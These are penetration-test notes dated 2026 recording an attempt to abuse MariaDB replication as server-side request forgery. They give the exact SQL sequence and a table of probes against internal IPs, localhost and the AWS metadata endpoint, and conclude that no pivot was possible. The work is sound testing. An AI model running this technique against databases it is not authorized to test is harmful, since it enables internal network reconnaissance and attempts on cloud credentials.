# prog2 — Replication SSRF Results
# Date: 2026-09-22

## CHANGE MASTER TO + START SLAVE = Replication SSRF

### Method
MariaDB replication IO thread makes outbound TCP connections.
Unlike FEDERATED (which only connects on data access), replication
uses a persistent background thread that continuously tries to connect.

```sql
STOP SLAVE; RESET SLAVE ALL;
CHANGE MASTER TO MASTER_HOST='<ip>', MASTER_PORT=<port>, 
  MASTER_USER='root', MASTER_PASSWORD='', MASTER_CONNECT_RETRY=1;
START SLAVE;
DO SLEEP(8);
SHOW SLAVE STATUS\G
STOP SLAVE; RESET SLAVE ALL;
```

### Results (8-second sleep)

| Target | Port | Service | Last_IO_Errno | Result |
|--------|------|---------|---------------|--------|
| 10.0.55.127 | 3306 | MySQL | 0 | connecting (timeout, DROP) |
| 10.0.55.127 | 22 | SSH | 2003 | blocked (firewall) |
| 10.0.55.127 | 80 | HTTP | 2003 | blocked (firewall) |
| 10.0.55.127 | 1433 | MSSQL | 2003 | blocked (firewall) |
| 10.0.55.127 | 6379 | Redis | 2003 | blocked (firewall) |
| 172.30.1.1 | 3306 | MySQL | 0 | connecting (timeout, DROP) |
| 172.30.1.1 | 22 | SSH | 2003 | blocked (firewall) |
| 172.30.1.1 | 80 | HTTP | 2003 | blocked (firewall) |
| 127.0.0.1 | 3306 | MySQL | 1045 | Access denied (wrong creds) |
| 127.0.0.1 | 22 | SSH | 2003 | blocked (firewall) |
| 127.0.0.1 | 80 | HTTP | 2003 | blocked (firewall) |
| 169.254.169.254 | 80 | AWS IMDS | 2003 | blocked (firewall) |

### Interpretation
- "blocked (firewall)" = Errcode 13 "Permission denied" = AWS Security Group blocks outbound
- "connecting (timeout)" = TCP SYN sent but no response (DROP)
- errno 1045 = MySQL reachable but authentication failed

### Conclusion
Outbound connections from prog2 are severely restricted:
- Port 3306 to internal MySQL hosts: filtered (DROP, not REJECT)
- All other ports to all hosts: blocked (Security Group)
- AWS IMDS: blocked
- localhost:3306: accessible but requires correct credentials

No pivot possible via replication SSRF.
